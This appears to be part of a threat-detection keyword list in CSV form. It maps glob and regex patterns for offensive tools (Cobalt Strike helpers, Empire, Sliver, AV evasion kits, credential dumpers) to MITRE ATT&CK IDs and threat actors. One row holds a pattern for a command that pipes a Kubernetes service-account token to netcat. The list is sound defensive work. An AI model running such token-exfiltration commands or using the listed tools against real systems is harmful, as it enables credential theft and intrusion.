"*InlineWhispers.py*",".{0,1000}InlineWhispers\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","N/A","10","10","315","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z","48581"
"*InlineWhispers2*",".{0,1000}InlineWhispers2.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","N/A","10","10","185","28","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z","48582"
"*INotGreen/GlllPowerloader*",".{0,1000}INotGreen\/GlllPowerloader.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","1","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","48584"
"*INotGreen/SharpThief*",".{0,1000}INotGreen\/SharpThief.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","48585"
"*INotGreen/XiebroC2*",".{0,1000}INotGreen\/XiebroC2.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","1","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","48586"
"*Input Merlin message base:*",".{0,1000}Input\sMerlin\smessage\sbase\:.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","48587"
"*input/shellcode_enc_raw.txt*",".{0,1000}input\/shellcode_enc_raw\.txt.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","48588"
"*input/shellcode_raw.txt*",".{0,1000}input\/shellcode_raw\.txt.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","48589"
"*ins1gn1a/Frampton*",".{0,1000}ins1gn1a\/Frampton.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","Exploitation tool","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","N/A","1","75","19","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z","48590"
"*InsecurePowerShell*",".{0,1000}InsecurePowerShell.{0,1000}","offensive_tool_keyword","InsecurePowerShell","powershell without securities features","T1059 - T1086 - T1117","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/cobbr/InsecurePowerShell","1","0","N/A","N/A","N/A","2","104","18","2017-12-19T03:40:33Z","2017-12-17T02:16:21Z","48591"
"*insecurityofthings*jackit*",".{0,1000}insecurityofthings.{0,1000}jackit.{0,1000}","offensive_tool_keyword","jackit","This is a partial implementation of Bastilles MouseJack exploit. See mousejack.com for more details. Full credit goes to Bastilles team for discovering this issue and writing the libraries to work with the CrazyRadio PA dongle. Also. thanks to Samy Kamkar for KeySweeper. to Thorsten Schroeder and Max Moser for their work on KeyKeriki and to Travis Goodspeed. We stand on the shoulders of giants.","T1210 - T1212 - T1560 - T1562","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/insecurityofthings/jackit","1","0","N/A","N/A","N/A","9","842","152","2020-10-01T04:37:00Z","2016-07-01T23:21:56Z","48592"
"*INSERT INTO LDAPHUNTERFINDINGS *",".{0,1000}INSERT\sINTO\sLDAPHUNTERFINDINGS\s.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","48593"
"*insert_top_100_passwords_1_G*",".{0,1000}insert_top_100_passwords_1_G.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","48594"
"*InsidePro-PasswordsPro.rule*",".{0,1000}InsidePro\-PasswordsPro\.rule.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","48595"
"*InspectAssembly.csproj*",".{0,1000}InspectAssembly\.csproj.{0,1000}","offensive_tool_keyword","InspectAssembly","Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations.","T1055.012 - T1027 - T1112","TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","48596"
"*InspectAssembly.exe*",".{0,1000}InspectAssembly\.exe.{0,1000}","offensive_tool_keyword","InspectAssembly","Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations.","T1055.012 - T1027 - T1112","TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","48597"
"*install  powershell-empire*",".{0,1000}install\s\spowershell\-empire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48598"
"*install * roadrecon*",".{0,1000}install\s.{0,1000}\sroadrecon.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","#linux","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","48599"
"*install bloodhound*",".{0,1000}install\sbloodhound.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","0","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","48600"
"*install c2tc-domaininfo*",".{0,1000}install\sc2tc\-domaininfo.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","48601"
"*install cdn-proxy*",".{0,1000}install\scdn\-proxy.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","N/A","3","249","24","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z","48602"
"*install certsync*",".{0,1000}install\scertsync.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145 - T1649","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","10","7","633","66","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z","48603"
"*install coercer*",".{0,1000}install\scoercer.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","48604"
"*--install -d kali-linux*",".{0,1000}\-\-install\s\-d\skali\-linux.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","48605"
"*install dploot*",".{0,1000}install\sdploot.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","48606"
"*install gobuster*",".{0,1000}install\sgobuster.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","0","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","48609"
"*install h8mail*",".{0,1000}install\sh8mail.{0,1000}","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Reconnaissance","https://github.com/opencubicles/h8mail","1","0","N/A","N/A","N/A","1","11","4","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z","48610"
"*install hakrawler*",".{0,1000}install\shakrawler.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/hakluke/hakrawler","1","0","#linux","N/A","6","10","4683","520","2024-12-21T20:40:03Z","2019-12-15T13:54:43Z","48611"
"*install hping3*",".{0,1000}install\shping3.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","N/A","10","1533","341","2024-07-10T12:38:39Z","2012-06-13T17:41:54Z","48612"
"*install hydra-gtk*",".{0,1000}install\shydra\-gtk.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","48613"
"*install impacket*",".{0,1000}install\simpacket.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","48614"
"*install Jira-Lens*",".{0,1000}install\sJira\-Lens.{0,1000}","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1083 - T1065 - T1204 - T1087 - T1203","TA0007 - TA0005 - TA0001","N/A","N/A","Reconnaissance","https://github.com/MayankPandey01/Jira-Lens","1","0","N/A","N/A","N/A","4","318","52","2024-12-31T20:06:51Z","2021-11-14T18:37:47Z","48615"
"*install kerbrute*",".{0,1000}install\skerbrute.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","48616"
"*install macchanger*",".{0,1000}install\smacchanger.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","0","N/A","N/A","8","1","67","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z","48617"
"*install p0f*",".{0,1000}install\sp0f.{0,1000}","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","48618"
"*install pivotnacci*",".{0,1000}install\spivotnacci.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","48619"
"*install pivotnacci*",".{0,1000}install\spivotnacci.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","48620"
"*install proxychains*",".{0,1000}install\sproxychains.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","48621"
"*install pypykatz*",".{0,1000}install\spypykatz.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","48623"
"*install s3scanner*",".{0,1000}install\ss3scanner.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","N/A","8","10","2743","384","2025-04-21T14:44:23Z","2017-06-19T22:14:21Z","48624"
"*install samdump2*",".{0,1000}install\ssamdump2.{0,1000}","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","Black Basta","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","N/A","10","6","N/A","N/A","N/A","N/A","48625"
"*install smbmap*",".{0,1000}install\ssmbmap.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","0","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","48626"
"*install smbmap*",".{0,1000}install\ssmbmap.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","0","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","48627"
"*install tor deb.torproject.org-keyring*",".{0,1000}install\stor\sdeb\.torproject\.org\-keyring.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","48629"
"*install udmp_parser*",".{0,1000}install\sudmp_parser.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","N/A","6","3","202","23","2024-11-20T15:58:21Z","2022-01-30T18:56:21Z","48631"
"*install wapiti*",".{0,1000}install\swapiti.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","48632"
"*install -y netcat; cat /run/secrets/kubernetes.io/serviceaccount/token | nc *",".{0,1000}install\s\-y\snetcat\;\scat\s\/run\/secrets\/kubernetes\.io\/serviceaccount\/token\s\|\snc\s.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","48633"
"*install_aclpwn*",".{0,1000}install_aclpwn.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48637"
"*install_ad_apt_tools*",".{0,1000}install_ad_apt_tools.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48638"
"*install_adidnsdump*",".{0,1000}install_adidnsdump.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48639"
"*install_amber*",".{0,1000}install_amber.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48640"
"*install_bloodhound*",".{0,1000}install_bloodhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48641"
